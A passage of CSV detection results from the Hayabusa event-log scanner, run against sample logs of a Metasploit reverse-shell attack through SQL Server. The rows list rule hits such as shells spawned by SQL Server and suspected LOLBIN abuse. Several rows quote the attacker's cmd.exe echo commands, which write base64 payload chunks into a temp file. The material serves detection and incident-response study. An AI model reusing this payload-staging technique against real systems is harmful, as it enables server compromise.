Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.995 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.997 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.269 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IHsEQQA5bjUAuwAH1ajfhfFABqpn0EAo0RAQQCjBBgDADMKxUhPjgBXjUUM5iGOc6pRx+HwF0EARNJABJUdQDxBUG7WTAAAaOBfQADo2KQAAIPEBFNTU2hMQKcA6Ds+ANSLVQyGIgiLYEx+QQBSUI1V9FFS6GRKAACLVfSNRfyNTftQUWgU0kABUujeSgA3hcAPhZoEPEqLNWj6QKoPvkX7g8Bag/g5D4dmBAAAM7iKiAgXQAD/JLaYFkAAi1X8UsAVbMFAs4PEBDvDoxBUnnAPsT0E0C1o+M9AE+htLAAA6SuTAADHBdQCQQABAAAA6R8Efk+JHRRZQADpFAQrAItF/FD/FVOh2ACjGPpAq+kWMgAAi02l2v8LbMGPAKOoAkEA6enPAAA5HWACLAB+DWgc0UAAzhQLAABuxATHJmACZAD/////6USc>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc48 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.269 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.269 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.271 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.544 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AACLVfxS/xWIwUA6o7gL2wDpsQMAACYdHNDmAOmpLAAAi0X8UP8ViMFAAFgvFygA6ZIWAACJHSDQQADpGAMAANYdYGnAm3QNaLzRQABM4AUAAIPEBIv2/AirhjUABYMxGzt8dVbHBTsCQQABAAAA6SukHgA5HSA4QQAPhEoDAABQ/xVwV0DsOR1gAkEAdFBuoDNAEug2BQAYg8QEi1X8Ujc/NQAAg8QEO8N1D8fnYOBBAAIAAADpDwMqADkdAjhBAA+EAwMAAFAMFXDBfQDH+FxlQQBUAAAA6e17/gCLSfxQNxVsFkAAllgCpADp1gIAiotu/FH/FWyMQACjZBoyAD5pENBAAN7DAABPuAIAAItF/LqVrkGDudCKCIgMVkA6H3X26aIXAC2LVVuhkiNhMVNonNFAAKpokNFMAFDoXkYAAIPEFCFEQEFz6XsCAK6LjPyLDXTB4q+DOQF+ETPSqAiKF1L/Oo0Yg4PECOsSiw1DwUDTM8CKB4sRigRCg/jAO8N0BkeYffzryIPJ/zNR8v730Uka6MqgAAA9AAQAhHYNaGjRQL/oWQQAm4PEBItV/Bfq/4v6M8DyrvfRI42F9Pv//1FSUHB4oAAAU/+N9Ir//2ic0UAAkGhQ0UAa6Y4A+7WLfe+LDXTBQACRzgF+ETPSTMeKF3D/+o99/IPESOsSoA149kAA/NmKHYsRihVCgwEIrcN0BkeaffzryIP3TTPA8q73tElR6OugAJI9AFAJAHYNaDTRQADoEwMMHYOdpItS/IOe/4v6yMDyrvf8SaKF9ML///VSUOc2oE0AU42N9Pv/UGiW0UAAUWiF0YkAixUEGEEAiJwF9Pv/G6FMQEEAUlDou0QAAIPEGKMEGEFe6V0BAACLTfyLFUhAwgChTEBBAFNonDtAAFFSUBWSRAAAi022iz2MwXoApAVoENFAAFGjSEBBAP8Ag/wghcB1D8fCfDpBlIsAAADp6gAAS4tV/GoHCwjRQABS/ziDxAyFwM0PSQWEAkEAagAAyenHAAAxHkX8agto/NCOAFD/1wHEDIV7DxfWAAAAxwWAAgwAAQAAxOmghwAAx4GIQ7GFUAAAAOmRAAAAi038x6iIYkEAIioAzokN6JEqG9NHi1XKgTrqXrh8wUAAg8QIwcPgErQY/1D/FbjBJwCDxASjdAJBAIvMK7pAPJ4AK9CKygoMAnA6y3X2Ga54AkEAAQAAAOvQvkX8xwWIDkEAAQAAAFOoFEEA6yOLTfzHBYgCQQCpAAAAhIO1F0FlsQ6LVQyLAlCO/S0AAIPEFotF9I0V/I1V+1FSaBTSQABQ6ERGAACFwA+ER/v//4tF9ItNCN81gHJAAEk5SHW+1ouGDIsWyMBAACbZQIsCUNvc0EAAokvWi1XTiwJQ6GstAACLRfSDxECLSKZ8UByLFIpBiUgyoUxAYACzUOjJK7Qrs+iaLwAAg8QEhcB0U4tqPaHIwEAAZMBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1184 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.544 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.544 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.546 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.819 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ixFSaMjQMgBQ/9aLTQyL6VK/W5MAAH3EEKHL0EAAO9l8Bz0gXAAAsS+LRQyLFcjAQABoIE5vAIPCQD8rUWig0EAAUqTWi0UMizis6CEtAAChGNBAAIPEFIsN9dBAADvBfivCVfaLDcjAfwCDwUA2sVBo5NBjAFH/1otVDIsCUOjtLAAAi28Q0EAAg8QROR0U0MAAdD6B+Zb5AAB+DxlnZmZm5NXB+o+ZysHpHwPRg72diRUU0EAAfSDHBRTQQABkAAAA/xTUN0UAAF9eM8Bbi+Vdw4kdFNBAAOgjLNAA/Q4RAACLFUxAQQBS6HI3AABfXgXAW4vlXcOQmxJAAHQSQADiE0AALhNAAIERQBtbEkAAOxZgAJr8QAAWEUAAAsVAAGJvQiZtEUAAThFAewgVQAAqP0AA6BBAAL8QQACMf0AAcudAABoSQAA9EjgAOxFAslkSfAB2FIwAhRRAAN8UQCXzFEAAFhVAAAAbARu3GxsuGxsbG6AbmQMbsQSFGwYbBxsbrRsbGxsbG4kJClYbDA0OGw8bqibqERKcGxQVFhcYGRqQkJCQkJCQkMSQkHKQWFXh7ItFCI1QyMBAAFCDwfxoadJAAFH/FYDBPgChrAJBAB7EBYXAdA9QaJrSQAD/FWTBQACDxAhqAf8VcMFAAJBVi+yB7LgAAEiheLlBToXAoUxAQQB0FGgxPJcAUP2eQAAAZosNdKxB50kUi7ReGEEAUlDoiEAAAGaLDfR3QQDpCBhBAKGIAkEAYO+LNWTBQOFmiQ1VC0EAhcCwdV2LFUoYCQBSIGi1QAD/1qV4AmgAg8QIhcB0FaF0AkEAUFdAmEEAaNhjQAD/hYNaDDvC0EAAhcBigNRAAHUF23wYQABQylLU/wD/1ovSyLpAAIPBIFH/FVTBQACDxAyLFRjQQADoNYfBQABojJEAAHgDTLuwC0EAjBAmQABqIFD/1ou8TEBBAFIVGNB6uYPEEIwuIEEAagBRmmj4F0HA6IFHAC6FwHT2UKdQKEAA6OIFAACDOAihfAJBAIXAyTWhrAtBABsNnAtB/YsVSBRBAGoAgZzRQABQoUxAQetRaEjUQABSUOi7iQAAgy0csEhAQQDrBUNIQEEAi6WAAkEAhcl1JosQTEBBANMAaJzRQEtoRNRAAGgr4EAAUFHohD8AXYPCGKNIQEEAiw2EAnoAhcl1HIsVTEBBAEgAxxjUGQB6UktePwARgy4Qo0gtQQCLx2AGQQC9yX8viydoAkEAvvzTQACF0nUFvtQCQQCLFXgCoQCF0osVQEBBAHUGixXkF0FnhWW5+NNAAHQFbG/TQABQRQQYuGRQoXRAQQBQmFJRiw0w0EAAaNTTBQBoAAgAAFFN3paSAIOnb+t9ihWJOEEAv0CBYAB20nBuv8jTQACLmmgCQQC+/NM1DYXSdQW+1AJBAIsVeAI9AIXSixVAQPIAdQaLFeQbqwCD+QG5wNNAAHQFubym>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x224 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.819 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.819 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.822 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.094 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QABQoXBPQQBXUOljGEEA2aFEcEEAUFZSUYuoMNAyAGh400AAaAII+wAa6J5vAACDxCw9AAgAAHINaAXTQADoAv3/44PEBKFYAkEAuwIAOgA7w1kpoWDgQQA7w7jQ00B5KvG4udMKAIsVJ/RAllJQBgLTQKv/FWjBQABGxAyLZTDQQACDyf8zwPKuoWACQQBZX0mD+AGJDewXUgB8cKFwAkEAjUxqAVH/FVzBQAClxASDwHUfpxXxwEAAaBTTMwCDwo9S/xWAwUAx1cQIKOK2i+Vdw4sVMNBAAIvwFEBCiA5GhMl1A6cV7BdBAA8NcAL2mos1IDhBAI08AovywekCb6WLyoPhsfOkozDQpgBXTEC8AGaLDbQLyQCLFQgYQQBQTQBRagBSk/wXvQDoDlQAAIvwZoW/dCyhCBhBAI2NSP///1Bo9NJAAFBeUeg+azAAD79xfatI/7z/UlDo7uAA4IPEGOimTgAAi/ChZAJBAIv6pTigC0EAhcCJPaQLQQCJNcDLQQCJhsR8QQB055lqemhA7ZEAUlDoXJkAAON5E9eJt+xAVfDrDsfz7P/////HRfD/5/9/aBcgWwBT/xUTwf4AoRjQQAAYZQgz9oXATTEz/6cNsAuzAIm0D1hT+QDLFbCtQRqNBBdQ6IAcAKOhGND/AIPEBFWBx2AIAABy8Hxmiw0YZkAAs1XoiU38iw0s0KYAjUX8UosVKNBAAFGh+AWzAFFSUOiDRwAAhWeKDlBo6NIkAAIUAgAAg8QIi0X8hcB1VWjU0kAAOhD7h/+DxATINvzHM/ScAAAAhcAPjrVTAG3HRcgAEwAAL034BkXoi3QBRIsmCIXJD4QoRgAAixKtKuFcAgr2wyN0cw/o3FYAAIPTBKtpUA/q5vEAAPbDBA9GsQAAAIN+EgEPhZ4AAACh/BdBAItO0VBR6I5LAACLDfgXQQCLVosy+I1FwFBRx0XEAQARCYlVzOgvRQAAG4X/dPYMVgRS6DFLAACLtcQCQTOhSQJBAEOLyEAB+QqJubEC+gCjuJGHAH4mixXIwEAJaLDSQACDXUDq4xWAwUBQD792UGiY0kAA6B/dAACDxBDHRggAAAAA62N/RggCACPcixWoAkEAQonYFAJBXkzoWQEAAIPEBIN+CAN1SYtOBCkBAAAAiU2MiYlF3KH4F0EAjS7QUlA0TfqJdeToTNWTAOs2ND24AkEAixXM+0EAMUKJPbhHQQCJlykCQQBW6Mo6APWDxASLRfKLVfiVTfxAg8LVO8GJRdaJVfgPtiIn//+LDbyKQQCLj03jNaGbAkEAfxt8DSkVRD5BABpN7Du1cww7BQ3QQACNjBK8//+LDRS1QACFyXQaUKHIpEAAg8BAFIDSQABQ/xWAwUCAg8QM64poeNJAAP8VWMFAhYPEBNaIAkEAhcDlDOjffWEAX15bi2ldw0gA6DECANluxARfXluL5V2nF5CQkJCQclWL7Lfs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xec4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.094 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.094 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.096 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.368 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo eOOLdQxWjUWIaniEVuiJaAAAi00IwBXIwEAArFGDwkBorN5AAIz2FYCuQAChrAJBAIPEFGPAdMxQaNfS3fU6FaC9zgCDxAhW/xVwwWEAXpCQRJDMkA6Q2ZC8OVWL7IPsFNRWuXUIV4tGFIlFwehJGgAAS6ALMgCJFaQLQQDM2ItGD4XAzvp1QIsNBGoAagBR6JaLAADNnjgIAACJvjwIAABcRhgAAAC8ixVUF7MAiVZzUbeQQQCFwHQ7oXACQQDNygPIiU776wKfjjgIpDOhKNAXAIsV8tA8AI/Ii4Y8CAAAE8I7+A+P5QAAAHwIO/4Ph6YAAACL3hiLHTDQQACLRgSNY3UDKFEWUOitawAAhRIqM4PBC8TRPWj9CgB0Jz3ZSQoAdLmYV/0KAKUZPST9CgB0Ej2hw5MAtwsOsyMLABWlpgAANIuoCIsdoAJBAIv6pAJBAAPcg9cviR2gAkEAiT2kIEEAi1YYi042A9boyIlWGImCtg+F7Jr1/8dGCN0AAC/oNEoAZaOgC0EAiRWkC10AkFYEibFACAAAMw2kC0FyuAEAAAAsRfBm1EX0iY5ECAAAi+trF/YcjUXsiU74UOqJzvzGH0BHAF9eW/zlXcN04NReAP8VZMFAX1boahoAAIPECMZeW4vlXcOLHbwCQQBovNRAAEOJJLwCQQAxq2TBGOhW6EIaAACDxAhfXluL5V3DkJCQkJCQkJBVi+yz7LzGAACLRZmVwHSG9YsJqwAQoAtBMokVpAtBPusLixWkC0EAoaA4QQDTix1tC0EA/leLPfcLQd8r0u7XifvYiVXQizVkwUAA34/YaLSY2gC0+kHCQADdXdC01mgvOUEZaKjfQAD/1qEAGEEAUGhGoUAA/8QzyWaLDUzdQQAvaMvfQAD/1miA1EAAw9YcFcNeQQAGJJ7fQMxv1rut0kEAUGgc30AA/9bTP9RAAP/Wiw3r3EAAlFkA388A/9aLVeKLRdBSFGjY3roA/9aLDawCQQCDxJ1RaLzFQAD/1osVuALnAFJooN4RAP/WqbjOQQCDxBCFwHQkocwCQemLDR4C7wAqFX8C4QBQocQCQQBRUlBokt5AAETWg/ROi5K8AkEAUWhI3kAAlNah0AJBAIPECIXAdHYoaCzeLgD/1oDECKEzYUEAhcB0EXQVsAKZAFJoEN5AANBKG1MIoZQCQQCLDcICQf5QUWjo3UAA/2ShYAJBiYPXDBb4AXUXixWkAkEM9KACQQBSUMLIpEAA/96DxAyDPWACQS4CdRiLaKQCQQCLFaACQQBRBmio3UAA/9aDxAyhnOKWuosNmDxBAFBRE4QUQAD/1n1F0NwdMMJAiebEDN/g9sRED4tqAAAAoewC2wCFwA+Ed6YAAN0FKMJAANx10IPsCN1dgNsFrAJBANxNgN0chGhQ3UAA/9bbBRjQQACDQQTcaNDcDSDnQADarqwCQQBCHPJoJN1AAP+c3UWV3A0g>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x274 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.368 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.368 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.370 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.643 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo wrR1g8QERzWsAugA3RyLaCjfQAD/1t+/kAJBAIPEBNxNgD0NGMJA+N0cFGik3EAA/9YsYAJBAIOlDIXAflnfO6ACd3KDyQjcTYDcDRjCUgDdHCQQfNJAAP/Wi+TfAkFaBrmQWLRjoaQCQQCLPZR/QQDw0xPHiQzYiUXcgwAE323Y3E2A3A14wkCo3RxHaIAIQAD/D4PEDKGsAkEAT8APjocNAAAzyerP/yb///9/O8FTTcCJTcSJTciJTQmJKuCJ1OSJTeiJTSaJfbCJVUSJfVeJdclTvWD////zlY////+JfQaJVdSJjXD///+JjXQ2//+ETbiJDPKJjTb//9mJjWyR//+JTYCJsISJjXiE//+JjXz///+JNQCJTayJTYgLTYyJTZCJTZSSjosBAAD6WcgLQRll0vSDwRCJZfxVeQSLRbSLGVLHfA2RBTktJHIGtl2wiX20i0EMi1EIOUWkfA2LBRoPoFAGiSKg3EWkK9Mbx4u9ZFD//zv4YhaiCDmVe///KHIMiZVg//9EiYVk//81i3kJi1nPOX3UfBJ/CvOJ0Ds1i3/hcgaJXfeJ7dSLnXRIsP/UWV5/J3wPo038i51w//8jrHE72XcWh838i6aJnXD///+LWdmJnXT////rA89N/ItJCYtdvDvZfyB8DfuyX4tduOBJYDvZdxGLTfyLWQiJXbhhQgyJXbzrAyRO/DmFbP//738WfAg5lcf///9DDImVaP///4mFbP///zl9hH8YfOWLSfiLXYA72cUe/HcJJFnciX1fifyAi+SLXcAD2YtN/IldwItdxA1JBPrZLk38uyPUi13Ii0kIA9mLTfyJXch9XcyLSQxY2YtNEr7K71XoiV3MISSHiU3guPX8ntiLU/iJ3lOLXewD0Iuz9IlVsRPfg8EgSIld7IlN/IlFsw+Fe/5e/6GsAkGUmYva3FXEi/iLRcAcV1JQpSaQAACLTcyJVZ2LVchTV1FSiUX4jBGQAACpTbyJRZiLTeRTV1BRplW56PyZtTqJVcyLVewpRciLRbpTV1JQ6OeNADUTD8ChrAJBAIXAiVWQD46IAAAA322Yiw3IpkHr3V3Y321ejQIQi0usAkEA3Vvx32033V3o323A3V3R3YV45WH/3UWo3UX03UWQ92gI3UXYg8AgSdjp2cDvySPG3evfaODdReDY6dnAu8neYt0x2YnY4SVl6NnJNNjZwMDJ3sPd2N9o2Npl8NnA2Mnewt3YdbLdgJDdhIjdXfXrBtyFeP///6HYAkEAr/gBV9uNUP+JVfT/RfTY+dn63Z14////6xRS9XjH/3wAAAAAx4V8rAb/AADbAIP4Ad3Yy5ONSP+JTbHbRfjcfajZ+t1dqOsOtUWIAAAAAMcucoUAALGDsAF+E41Q2YlV9Nss9Nz9iNkx3V1x61nHRYgAAADvx0WMjgAAAIP4AX4sjUj/iU0829/04X2Q2Yr1FKvrDsdFYgAAAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.643 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.643 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.645 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.917 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo RZQA/QAAixXIC0EAaCwwIwBqIFDH/zNEwUAAiz2sXEEAg0aNg/8BfkCLhCUBAACAeQV8g8j+QHQwi+iLHaAYQQCZmsIJANH4weBDA8NqAotIMItQEANTi1A0E1AU3VHoQY4AAIlF8Osbi8eLHWQLQQCZrcLR+MHgBYtMGBCJTf+LVBgUaBIxQAAfIDlTs5v0XBVEweEAlz2sAkE+g8oQg/8Bfk+LxyWOegCAeQWUg8j+QHQ/48eLHcjeQQCZKydqANH4E+AoA8NqAosePotQCSspi1A8G1A0K0gQG1AUA3hjxikcUlHoPI0AAIlF6IlVPus7i8eLPcgfQS+ZK8Iz+MHgBQPDi4cdi2pmA8qLS5WJTSOLSBx5yolN7HzAMUAAaiBXU4YVRMGv4YtArAJBAIP1EIP/AX5APcclAQAAgKgFtoPIS0B0MIvoix3IC3wAmSvCagDR+MFoBVjDagKLNyiLUAgDyItQLBNNDFJR6ICN2C6JReCiG6LHix3IC0EAmSsf3PjB4AWLTBgIiU3gi90YDGggMQgAaiBXU4kr5CQVRMFAdqGsAkEAQMQ3g/gBn0KLyI/hAQAAgDIFSYPJ/uF0MZkrp4scEQtBANH4weDdA8JqAGoCKEg4i1iE91A8i3gceKET11JR6LeMAACL04va6xeZVMJbyP66C0EA0fnB2gWLfgEYi1wBHNY43EAA/9aLG7CLTbSDxAQF9AEAAIPRjmoAaOjNAABRUOx0jMcAi02kiUWwi0WgagAF9AG8AGgMAwAAg9EAiVW0UVDoJy0AAItN/IlFQYtF+GoABfQBAACQ6AOQAIPRAO9VeFFQ6DAvAMSLTcyJRfiLRcNqAI/aAQAAaO